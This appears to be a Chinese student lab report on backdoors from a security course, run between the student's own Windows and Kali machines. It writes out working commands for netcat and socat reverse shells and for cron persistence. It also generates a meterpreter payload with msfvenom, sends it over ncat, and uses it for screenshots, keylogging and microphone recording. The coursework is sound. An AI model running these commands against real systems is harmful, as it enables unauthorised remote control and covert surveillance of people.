20145316许心远第二次实验《后门原理与实践》

20145316许心远第二次实验《后门原理与实践》

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式？

• 从网络上下载来路不明的盗版软件、压缩包，还有一些小视频……

  2.例举你知道的后门如何启动起来(win及linux)的方式？

• 双击打开。

• 取得shell后远程直接执行后门这个可执行文件。

  3.Meterpreter有哪些给你映像深入的功能？

• 感受它超级强大……每一个功能都很让我印象深入！开摄像头，看界面，录音频……彻底没有任何隐私可言啊。

  4.如何发现本身有系统有没有被安装后门？

• 若是翻看任务管理器时，机器内存占用很是严重，关掉主要应用程序仍是有占用，任务里有并不认识的exe程序，那颇有可能就是被安装了后门。

  实验总结与体会

• 我的感受此次实践比上次还有趣，尤为是后门被激活后，meterpreter的功能一经展现出来，简直被震惊。若是未开启防火墙，或防火墙不够高级，所谓监听、隐秘偷拍居然是这么垂手可得的事情。
• 实验过程总的不难，但也遇到了很气的部分。由于本身的疏忽忘记关防火墙（我觉得本身关掉了），致使在win10系统内一直没法激活那个后门程序，后来换了xpattacker靶机也不能够，提示什么“不是win32文件”。总之，很纠结，浪费了两个小时，好在在武钰等同窗的提醒和帮助下，找到了问题，攻克后，后面就比较简单了。

• 由于我是win10系统，自己存在必定的坚固性，因此最后的提权暂时没作出来，准备以后本身再按个虚拟机或者借同窗的win7系统完善一下。

  实践过程记录

  windows得到linux的shell

• 为windows系统安装ncat软件，我安装在了C盘根目录下了。
• 用ipconfig和ifconfig指令分别查看windows主机和kali虚拟机的ip地址。分别为kali：192.168.234.140 windows：172.30.0.152
  
  
• windows下使用如下命令ncat.exe -l -p 5316监听
  kali下使用nc 172.30.0.152 5316 -e /bin/sh反弹链接windows
  
  

• windows得到linux的shell
  

  linux得到windows的shell

• linux主机使用nc -l -p 5316命令于5316端口进行监听
  
• windows主机使用ncat.exe -e cmd.exe 192.168.234.140 5316命令经过5316端口反弹链接linux主机
  

• linux得到windows的shell
  

  启动cron

• 在linux终端下使用crontab -e命令修改用户的cron配置，弹出一个vi界面
  
• 修改部分以下
  

• cron启动成功
  

  windows利用socat获取kali的shell

• kali上用socat tcp-listen:5316把cmd绑定到端口5208
• 同時用socat tcp-l:5316 system:bash,pty,stderr反弹链接
  
• windows使用socat readline tcp:192.168.234.140:5316开启监听
  

• 成功,用ls检验

  meterpreter获取主机shell

• linux使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.140 LPORT=5316 -f exe >20145316.exe来生成后门程序，而后发送到windows机中。
  
• windows输入指令ncat.exe -lv 5316 >20145316.exe
  
• linux使用命令ncat -nv 172.30.0.152 5316 < 20145316.exe传送后门程序
  
• 在windows主机ncat文件夹下查看是否有后门文件植入
  
• 使用msfconsole命令开启msf进行设置
  

• 监听开始，在windows双击20145316.exe运行后门程序，实现远程控制
  
  

  meterpreter实现特殊功能

• 查看主机文件夹信息
  
• 获取靶机屏幕截屏
  
  
• 记录靶机击键记录
  
• 调用靶机麦克风，录制音频文件
  

• windows上任务管理器能够看到后门正在运行